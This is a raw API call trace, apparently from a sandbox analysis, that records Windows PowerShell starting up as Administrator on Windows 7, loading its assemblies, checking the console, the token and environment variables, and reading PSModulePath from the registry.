	[0762.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0763.267] SetErrorMode (uMode=0x1) returned 0x1
	[0763.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12dd60 | out: lpFileInformation=0x12dd60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0763.268] SetErrorMode (uMode=0x1) returned 0x1
	[0780.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0780.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0780.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0780.171] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0780.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.171] CoTaskMemFree (pv=0x2a6990) 
	[0783.467] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0783.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.467] CoTaskMemFree (pv=0x2a6990) 
	[0783.467] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0783.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.467] CoTaskMemFree (pv=0x2a6990) 
	[0783.470] CoCreateGuid (in: pguid=0x12e128 | out: pguid=0x12e128*(Data1=0xf5d27bd4, Data2=0x5f24, Data3=0x40dd, Data4=([0]=0xa3, [1]=0xed, [2]=0x9a, [3]=0xeb, [4]=0xf8, [5]=0xe6, [6]=0x71, [7]=0xf4))) returned 0x0
	[0783.474] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0783.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.474] CoTaskMemFree (pv=0x2a6990) 
	[0783.477] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0783.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.477] CoTaskMemFree (pv=0x2a6990) 
	[0783.479] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0783.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.480] CoTaskMemFree (pv=0x2a6990) 
	[0783.502] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0784.303] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12ddd0 | out: lpConsoleScreenBufferInfo=0x12ddd0) returned 1
	[0784.325] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0784.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12ddd0 | out: lpConsoleScreenBufferInfo=0x12ddd0) returned 1
	[0784.326] GetVersionExW (in: lpVersionInformation=0x12dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0784.329] GetCurrentProcess () returned 0xffffffffffffffff
	[0784.330] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12ddf8 | out: TokenHandle=0x12ddf8*=0x2f8) returned 1
	[0784.335] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dd18 | out: TokenInformation=0x0, ReturnLength=0x12dd18) returned 0
	[0784.336] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x291a60
	[0784.336] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x291a60, TokenInformationLength=0x4, ReturnLength=0x12dd18 | out: TokenInformation=0x291a60, ReturnLength=0x12dd18) returned 1
	[0784.337] DuplicateTokenEx (in: hExistingToken=0x2f8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12de78 | out: phNewToken=0x12de78*=0x2fc) returned 1
	[0784.338] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dd18 | out: TokenInformation=0x0, ReturnLength=0x12dd18) returned 0
	[0784.338] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x291820
	[0784.338] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x8, TokenInformation=0x291820, TokenInformationLength=0x4, ReturnLength=0x12dd18 | out: TokenInformation=0x291820, ReturnLength=0x12dd18) returned 1
	[0784.339] CheckTokenMembership (in: TokenHandle=0x2fc, SidToCheck=0x2ce6430*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12de88 | out: IsMember=0x12de88) returned 1
	[0784.339] CloseHandle (hObject=0x2fc) returned 1
	[0784.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0785.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0785.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0785.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.188] CoTaskMemAlloc (cb=0x804) returned 0x1b843610
	[0786.188] GetConsoleTitleW (in: lpConsoleTitle=0x1b843610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0786.189] CoTaskMemFree (pv=0x1b843610) 
	[0787.080] CoTaskMemAlloc (cb=0x804) returned 0x1b843ec0
	[0787.080] GetConsoleTitleW (in: lpConsoleTitle=0x1b843ec0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0787.080] CoTaskMemFree (pv=0x1b843ec0) 
	[0787.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.083] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0789.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.027] SetConsoleCtrlHandler (HandlerRoutine=0x2c4689c, Add=1) returned 1
	[0791.050] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f4
	[0791.053] CoCreateGuid (in: pguid=0x12df70 | out: pguid=0x12df70*(Data1=0x3b478080, Data2=0x4c7d, Data3=0x4d71, Data4=([0]=0xb9, [1]=0xd1, [2]=0xd6, [3]=0xaa, [4]=0xe9, [5]=0xcf, [6]=0xd9, [7]=0xe2))) returned 0x0
	[0791.054] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0791.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.054] CoTaskMemFree (pv=0x2a6990) 
	[0792.113] WinSqmIsOptedIn () returned 0x0
	[0792.114] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.114] CoTaskMemFree (pv=0x2a6990) 
	[0792.115] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.115] CoTaskMemFree (pv=0x2a6990) 
	[0792.116] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.116] CoTaskMemFree (pv=0x2a6990) 
	[0792.116] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.116] CoTaskMemFree (pv=0x2a6990) 
	[0792.117] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.117] CoTaskMemFree (pv=0x2a6990) 
	[0792.118] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.118] CoTaskMemFree (pv=0x2a6990) 
	[0792.119] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.119] CoTaskMemFree (pv=0x2a6990) 
	[0792.119] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.119] CoTaskMemFree (pv=0x2a6990) 
	[0792.121] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.121] CoTaskMemFree (pv=0x2a6990) 
	[0792.125] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.125] CoTaskMemFree (pv=0x2a6990) 
	[0792.126] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.126] CoTaskMemFree (pv=0x2a6990) 
	[0792.126] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0792.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.126] CoTaskMemFree (pv=0x2a6990) 
	[0794.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.287] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0796.287] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0796.287] CoTaskMemFree (pv=0x2a6990) 
	[0796.288] CoTaskMemAlloc (cb=0xcc) returned 0x1b840860
	[0796.288] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b840860, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0796.289] CoTaskMemFree (pv=0x1b840860) 
	[0796.289] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dae8 | out: phkResult=0x12dae8*=0x310) returned 0x0
	[0796.289] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da6c, lpData=0x0, lpcbData=0x12da68*=0x0 | out: lpType=0x12da6c*=0x2, lpData=0x0, lpcbData=0x12da68*=0x6c) returned 0x0
	[0796.289] CoTaskMemAlloc (cb=0x70) returned 0x2823e0
	[0796.289] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da3c, lpData=0x2823e0, lpcbData=0x12da38*=0x6c | out: lpType=0x12da3c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12da38*=0x6c) returned 0x0
	[0796.289] CoTaskMemFree (pv=0x2823e0) 
	[0796.289] CoTaskMemAlloc (cb=0xcc) returned 0x1b840860
	[0796.289] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b840860, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0796.290] CoTaskMemFree (pv=0x1b840860) 
	[0796.290] CoTaskMemAlloc (cb=0xcc) returned 0x1b840860
	[0796.290] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b840860, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0796.290] CoTaskMemFree (pv=0x1b840860) 
	[0796.294] RegCloseKey (hKey=0x310) returned 0x0
	[0796.294] CoTaskMemAlloc (cb=0xcc) returned 0x1b840860
	[0796.294] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b840860, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0796.294] CoTaskMemFree (pv=0x1b840860) 
	[0796.294] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dae8 | out: phkResult=0x12dae8*=0x310) returned 0x0
	[0796.294] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12da6c, lpData=0x0, lpcbData=0x12da68*=0x0 | out: lpType=0x12da6c*=0x0, lpData=0x0, lpcbData=0x12da68*=0x0) returned 0x2
